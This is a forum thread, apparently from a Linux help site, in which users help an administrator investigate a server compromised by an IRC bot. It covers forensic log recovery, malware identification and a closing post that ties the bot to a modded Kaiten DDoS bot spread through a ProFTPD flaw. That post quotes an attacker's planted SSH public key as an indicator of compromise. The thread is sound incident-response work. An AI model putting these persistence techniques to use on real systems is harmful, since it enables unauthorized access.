Well no direct root access from ssh, sshd on a different port than the normal one, root pwd different from ssh user, and firewall input/output...

So surely not from kiddies/newbies. But we (one of us is, much better than me) are inverstigating.

The idea behind my post, was nobody has already seen this S99lvm/cpsd ircd bot ?
This could have give us much more informations...

I did some googling and wasn't able to come up with anything other than the pcsc-lite problem I linked to earlier. It could be that if you ran something like rkhunter, something more meaningful may crop up. Or evidence from your investigation may reveal something. If this thing is more widespread out in the wild, either it hasn't been noticed yet, or it might be under different name (or I need remedial Google training).

One thing we don't have is a summary of what kinds of services this system ran, and what was exposed to the internets. For example, is this a web server running a bunch of PHP programs? That might help in trying to figure out not only how it got in, but it might give some idea what it is.

It may or may not be one of the most common IRC bots out there, but no one will know if they've seen it because all they have to go on is a filename. You can name a file anything.

An easy thing you can do to see if anyone has seen it is to run "strings -a <program name> > malware.txt" then google for certain strings of interest that may uniquely identify it. Your luck will vary depending on if the malware is packed in some way, but you may find anything from other people who have seen it before to actual source code. Then again, you may find nothing.

A lot can be learned from reverse engineering malware, however, determining how you were compromised may be a question that no amount of reverse engineering it can answer.

Update: Forgot to mention that another thing you can do is submit the hash or binary to something like VirusTotal to see if you can find out what various AV software thinks of it.

Another tidbit of info.

The host that's serving IRC content is located in the Dominican Republic. The server shows "irc.foonet.com" when telnet'ing to the IP on port 6667. "irc.foonet.com" is all over the internet (I've no idea if a certain ircd is associated with that specific network...a quick google search didn't show anything).

OK...kinda weird...I checked the IP's whois info at work today (sometime this morning, eastern time) and it showed that the hosting was in DR. Depending on how I search, I'm getting results of Global IP and DR. I guess it doesn't matter anymore, though. The culprit system is more than likely compromised itself.

Not that I know but for instance Unrealircd has "irc.foonet.com" on their example confs. So if people use an example conf but don't change the banner then it might welcome users with something like "welcome to irc.foonet.com" (foonet.com itself being in AS29838 but dnetnoc.net is in AS7819 BTW).

//Meanwhile, and sure he's free to do that, the OP decided to try his luck elsewhere. Maybe we should ask him to invite the more seasoned one on the case to replace him in this discussion. Oh well...

The OP has just let a comment there... My english is not so good, so could you please explain me what means this
Is there a pbm with the fact that one of us wrote this comment ?

Anyway..

As I already said, thanks to everybody for all your answers, comments ,help.

This box is hosting
qmail/courrier
httpd
php
sftp
dns

It's not an hosting box (I mean there isn't no known website/user on it)

It's one of our private box.

I've seen, somebody has installes wine + utorrent and use it with a vncserver (from a tunnel)...
I've also seen, that proftpd has been used with a user with a very easy pwd...

We surely never know how it did happens.

But we are working hard to be sure it never happens again.

If you don't investigate then you'll never know.

This thread has given you enough clues so far IMHO. So what is it that keeps you from investigating this properly? Is it a matter of time? Or expertise? Sure we could help, we've got a few people here who deal with breaches of security quite regularly, but you have to feed us more than just snippets. If you don't want to share logs et cetera publicly then by all means feel free to contact me by email.

We are investigating. But as I already said, all the logs had been deleted..

Also, it's true that I'm not a linux security expert...

The logs will still be in unallocated space unless they have been overwritten; either intentionally by wiping them instead of deleting them, or they could of been overwritten accidentally by adding new files like the pirated material. You don't know until you investigate further.

It's been a while since I did it, but I've had logs deleted before, and most of the logs were recovered by:

1. Using blkls from the Sleuth Kit to extract unallocated space from a dd image of the hard drive to unallocated.dd.

2. Running strings on unallocated.dd to save readable strings to unallocated.str.

3. Grep unallocated.str with a regular expression to extract strings that matched syslog format and saved them as syslog.str.

As unspawn mentioned, there are more logs than those created by syslog. You can also take an educated guess of how it happened by knowing what services/versions were exposed and what known vulnerabilities may exist in that software.

By investigate further, perhaps you will even find your computer is attacking other computers using the same exploit that the attacker used to exploit your computer.

After reinstalling, if you have a NIDS/HIDS monitor your server, and send your logs to a remote syslog server, you will probably find the attacker is trying to exploit the same vulnerability he was successful with the first time, which shows how he got in.

My point is, just because important logs were deleted, it doesn't mean it's game over.

root shouldn't ever been making an IRC connection to anywhere, let alone a machine that looks to be a nameserver. You may wish to warn the admin of that machine as well, if you haven't already, as it's likely being used as a C&C.

1 members found this post helpful.

I've been tracking this guys for a while now.
Its a dominican guy and most likely a colombian guy.
They exploit a ProFTPD remote root command execution bug released on Nov, 07.
The file in question is a modded version of kaiten irc bot.
He uses it to connect to that network and thru there give commands to a bunch of bots, mostly he uses them to DDOS.
I sniffed some of his actions and ips. Big part are targeted in colombian sites and central american sites.
I also managed to get his command that actually insert the bot into ur machine.

do not execute this:
U might want to check ur /root/.ssh/authorized_keys for:

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA2MHMyWps9N4NuEDvMCuTLLWuzJJ0yLeAruGGKo1TxrbFuDNLMcFr4kGFj8urc3MtMtqbycRn 789u3drVYvdrRjUzEqHPxfae+JkugjmxnvS0hWGLzKrGL2VF3TQ2zo4rmYVe0hJ/UJ3pG6I67nXiDz1l/ajlWmalcpNVIjdTxzqv4HOnTcvdYiAx+YRTaswLN47qohK70jP5DlzC/sjypXqgDPMq1SinHpedMcJSaXjfyhN4pIKnSXXybAdbgPk7ry1hpZkOXbigl5lVFoen/oTm0mebj/k544nETbFSj7SS9wihleLTv404hyVEdynUiaZh5VGHzo0PGldc9KdZtQ== root@bt

He insert RSA key to prolly have a quick access to your box without needing a password or rk.
I'll be back later with more details.

1 members found this post helpful.